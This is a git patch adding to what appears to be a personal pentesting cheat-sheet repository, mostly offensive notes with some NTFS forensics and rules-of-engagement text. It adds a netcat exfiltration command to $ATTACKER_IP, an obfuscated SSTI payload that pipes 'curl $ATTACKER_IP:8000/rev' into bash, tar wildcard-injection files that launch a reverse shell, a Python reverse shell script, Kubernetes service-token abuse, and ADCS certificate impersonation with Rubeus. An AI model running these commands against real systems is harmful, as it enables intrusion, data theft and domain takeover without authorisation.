From d08a37a97db75e478b8d5adb253c741ed13c3040 Mon Sep 17 00:00:00 2001 From: whx Date: Wed, 23 Feb 2022 23:55:12 +0100 Subject: [PATCH] bump --- .gitmodules | 3 ++ enumeration/docs/kubectl.md | 37 ++++++++++++++++++++++ enumeration/snmp/onesixtyone.md | 11 +++++++ exfiltration/linux/nc.md | 11 +++++++ exfiltration/windows/evil-winrm.md | 6 ++++ exploit/web/ssti/ssti.md | 5 +++ exploit/wildard_exploitation.md | 6 ++++ forensics/ntfs.md | 48 ++++++++++++++++++++++++++++ misc/AD_CS.md | 50 ++++++++++++++++++++++++++++++ pentesting.md | 15 +++++++-- reverse_shells/sock_shell.py | 10 ++++++ stego/stego-toolkit | 1 + 12 files changed, 201 insertions(+), 2 deletions(-) create mode 100644 enumeration/docs/kubectl.md create mode 100644 enumeration/snmp/onesixtyone.md create mode 100644 exfiltration/linux/nc.md create mode 100644 exfiltration/windows/evil-winrm.md create mode 100644 forensics/ntfs.md create mode 100644 misc/AD_CS.md create mode 100644 reverse_shells/sock_shell.py create mode 160000 stego/stego-toolkit diff --git a/.gitmodules b/.gitmodules index 51ef318..5ca311d 100644 --- a/.gitmodules +++ b/.gitmodules @@ -133,3 +133,6 @@ [submodule "misc/static-binaries"] path = misc/static-binaries url = https://github.com/andrew-d/static-binaries.git +[submodule "stego/stego-toolkit"] + path = stego/stego-toolkit + url = https://github.com/DominicBreuker/stego-toolkit.git diff --git a/enumeration/docs/kubectl.md b/enumeration/docs/kubectl.md new file mode 100644 index 0000000..2210db8 --- /dev/null +++ b/enumeration/docs/kubectl.md @@ -0,0 +1,37 @@ +# Kubectl + +```sh +kubectl get pods +``` +* Check mounted secret +```sh +kubectl auth can-i --list +kubectl get secrets +kubectl get nodes +kubectl get deployments +kubectl get services +kubectl get ingress +kubectl get jobs +``` +* Intel about a secret, and output +```sh +kubectl describe secrets +kubectl describe secrets -o 'json' +``` +## Abuse Token +* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token` +* By change of an LFI extract the token and +```sh +kubectl auth can-i --list --token=$TOKEN +kubectl get pods --token=$TOKEN +kubectl exec -it --token=$TOKEN -- /bin/sh +``` + +## Create Pods + +* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git) +* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file +```sh +kubectl apply -f pod.yml --token=$TOKEN +kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash +``` diff --git a/enumeration/snmp/onesixtyone.md b/enumeration/snmp/onesixtyone.md new file mode 100644 index 0000000..e6782fe --- /dev/null +++ b/enumeration/snmp/onesixtyone.md @@ -0,0 +1,11 @@ +# SNMP Enumeration + +* Find community strings +```sh +onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt +``` +* Query users +``` +snmpwalk -v2c -c $TARGET_IP 1.3.6.1.4.1.77.1.2.25 +``` + diff --git a/exfiltration/linux/nc.md b/exfiltration/linux/nc.md new file mode 100644 index 0000000..8ab23e8 --- /dev/null +++ b/exfiltration/linux/nc.md @@ -0,0 +1,11 @@ +# Netcat + +* RX +```sh +nc -lp 8080 > out.txt +``` +* TX +```sh +nc $ATTACKER_IP 8080 < in.txt +``` +* Have to be end manually after a while diff --git a/exfiltration/windows/evil-winrm.md b/exfiltration/windows/evil-winrm.md new file mode 100644 index 0000000..1d7988d --- /dev/null +++ b/exfiltration/windows/evil-winrm.md @@ -0,0 +1,6 @@ +# Evil-winrm + +* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp` +```sh +download C:\Windows\Temp\ +``` diff --git a/exploit/web/ssti/ssti.md b/exploit/web/ssti/ssti.md index 926a000..258f610 100644 --- a/exploit/web/ssti/ssti.md +++ b/exploit/web/ssti/ssti.md @@ -57,3 +57,8 @@ template = "User input is {{ input }}" return render_template_string(template, input=input) ``` +## Bypass +* Save reverse shell as `rev` +```sh +{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}} +``` diff --git a/exploit/wildard_exploitation.md b/exploit/wildard_exploitation.md index bc0ce98..319f2ad 100644 --- a/exploit/wildard_exploitation.md +++ b/exploit/wildard_exploitation.md @@ -5,6 +5,12 @@ * cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed. +```sh +echo "mkfifo /tmp/oytqnhq; nc 0/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh +echo "" > "--checkpoint-action=exec=sh shell.sh" +echo "" > "--checkpoint=1" +``` +or ```sh echo "mkfifo /tmp/oytqnhq; nc 0/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" diff --git a/forensics/ntfs.md b/forensics/ntfs.md new file mode 100644 index 0000000..6ef15ce --- /dev/null +++ b/forensics/ntfs.md @@ -0,0 +1,48 @@ +# NTFS + +* Has the following advantages over FAT + * Journaling + * ACL + * Volume Shadow Copy + * Alternate Data Stream + +## Master File Table +* VBR references to `$MFT` +* `$LOGFILE` stores transactions of the file system +* `$UsnJrnl` changed files, and reason for change + +## Caching + +* File information is cached for frequent use in +```sh +C:\Windows\Prefetch\*.pf +``` +* An SQLite database can be found under +```sh +C:\Users\\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db +``` + +## Jumplist + +* Stores recently used files of applications inside the taskbar +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations +``` + +## Shortcut Files +```sh +C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\ +C:\Users\\AppData\Roaming\Microsoft\Office\Recent\ +``` + +## Internet Explorer History +```sh +C:\Users\\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat +``` + +## Removeable Device Setup Log +```sh +C:\Windows\inf\setupapi.dev.log +``` + + diff --git a/misc/AD_CS.md b/misc/AD_CS.md new file mode 100644 index 0000000..c4d4e39 --- /dev/null +++ b/misc/AD_CS.md @@ -0,0 +1,50 @@ +## Active Directory Certificate Service ADCS + +* Internal CA +* PKI +* File system encryption +* Digital signatures +* User authentication + +* __Certificates will not be revoked after account password reset__ + +## Certificate Templates + +* Extended/Enhanced Key Usage +* Parameter combination can be exploited + +### Enumeration + +* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit) + +```sh +certutil -v -template > ct.txt +``` + +Exploitable templates should have the following traits: +* `Allow Enroll` or `Allow Full Control` permissions to request certificate + * Find groups by `net user /domain` --> `Domain Users`, `Domain Computers` +* Client authentication EKU for Kerberos authentication --> `Client Authentication` +* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` + +### Certificate Creation + +* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account) +* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll` +* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__ +* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save + +### Impersonation + +* Request TGT with the created cert +* Grab TGT + +* On the machine via +```sh +Rubeus.exe asktgt /user: /enctype:aes256 /certificate: /password: /outfile: /domain: /dc: +``` +* Select a domain admin via opening `Active Directory Users and Computers` +```sh +.\Rubeus.exe changepw /ticket: /new: /dc: /targetuser:\ +``` +* `runas /user:\ cmd.exe` diff --git a/pentesting.md b/pentesting.md index a252e19..7080d9c 100644 --- a/pentesting.md +++ b/pentesting.md @@ -1,10 +1,21 @@ # Pentesting * [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) Authorized audit of security systems of computers and networks. -* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) +* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/) * Permissions - * Scope + * Engagement --> internal/external pentest or adversary emulation of APTs + * Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS * Rules +* NDA + +## Campaign +* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/) +* [vectr.io](https://vectr.io) + +* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines +* Operations --> Operators, Known Information, Responsibilities +* Mission --> Exact commands to run and execution time of the engagement +* Remediation --> Report, Remediation consultation ## Methodology diff --git a/reverse_shells/sock_shell.py b/reverse_shells/sock_shell.py new file mode 100644 index 0000000..effe269 --- /dev/null +++ b/reverse_shells/sock_shell.py @@ -0,0 +1,10 @@ +import os +import socket +import subprocess + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(("#Target", 3000)) +os.dup2(s.fileno(), 0) +os.dup2(s.fileno(), 1) +os.dup2(s.fileno(), 2) +import pty;pty.spawn("/bin/bash") diff --git a/stego/stego-toolkit b/stego/stego-toolkit new file mode 160000 index 0000000..4e6c2da --- /dev/null +++ b/stego/stego-toolkit @@ -0,0 +1 @@ +Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348